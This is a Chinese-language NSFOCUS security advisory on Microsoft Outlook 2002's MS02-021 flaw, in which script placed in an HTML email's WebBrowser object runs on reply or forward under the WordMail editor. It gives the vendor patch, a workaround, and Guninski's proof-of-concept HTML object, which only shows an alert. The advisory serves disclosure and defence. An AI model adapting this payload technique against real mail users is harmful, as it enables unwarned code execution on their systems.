首页 -> 安全研究

安全研究

安全漏洞
Microsoft Outlook 2002 HTML形式邮件脚本执行漏洞(MS02-021)

发布日期:2002-03-31
更新日期:2002-04-05

受影响系统:
Microsoft Outlook 2002
描述:
BUGTRAQ  ID: 4397
CVE(CAN) ID: CVE-2002-1056

Microsoft Outlook 2002是一款Office XP附带的邮件客户端程序,由Microsoft公司维护和开发。

Microsoft Outlook 2002在处理HTML形式邮件上存在漏洞,可导致嵌入到HTML邮件的脚本代码在没有警告用户的情况下执行。

攻击者可以通过建立由<PARAM ... >标记在"Location"参数中包含脚本代码的Web浏览器对象(web browser object),并嵌入到HTML形式邮件中,当用户接收到此邮件并进行转发和回复操作的时候,可导致脚本代码被执行。

攻击者可利用此漏洞在目标用户系统上执行任意命令。

根据测试,此问题只存在于如果用WordMail编辑器编辑信件时才存在,而使用Outlook默认的编辑器不存在此漏洞。

<*来源:Georgi Guninski (guninski@guninski.com
  
  链接:http://archives.neohapsis.com/archives/bugtraq/2002-03/0371.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Georgi Guninski (guninski@guninski.com)提供了如下测试方法:


--------------------------------------
<OBJECT id=WebBrowser1 height=150 width=300
classid=CLSID:8856F961-340A-11D0-A96B-00C04FD705A2>
<PARAM NAME="ExtentX" VALUE="7938">
<PARAM NAME="ExtentY" VALUE="3969">
<PARAM NAME="ViewMode" VALUE="0">
<PARAM NAME="Offline" VALUE="0">
<PARAM NAME="Silent" VALUE="0">
<PARAM NAME="RegisterAsBrowser" VALUE="1">
<PARAM NAME="RegisterAsDropTarget" VALUE="1">
<PARAM NAME="AutoArrange" VALUE="0">
<PARAM NAME="NoClientEdge" VALUE="0">
<PARAM NAME="AlignLeft" VALUE="0">
<PARAM NAME="ViewID" VALUE="{0057D0E0-3573-11CF-AE69-08002B2E1262}">
<PARAM NAME="Location" VALUE="about:/dev/random<scrip>while (42) alert('HOHOHO\nTrying to sell trustworthy computing\nHOHOHO')</script>">
<PARAM NAME="ReadyState" VALUE="4">
</OBJECT>
-------------------------------------

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 如果使用WordMail编辑器编辑信件的用户,请转换为使用Outlook默认编辑器编辑。

厂商补丁:

Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS02-021)以及相应补丁:
MS02-021:E-mail Editor Flaw Could Lead to Script Execution on Reply or Forward (Q321804)
链接:http://www.microsoft.com/technet/security/bulletin/MS02-021.asp

浏览次数:3039
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障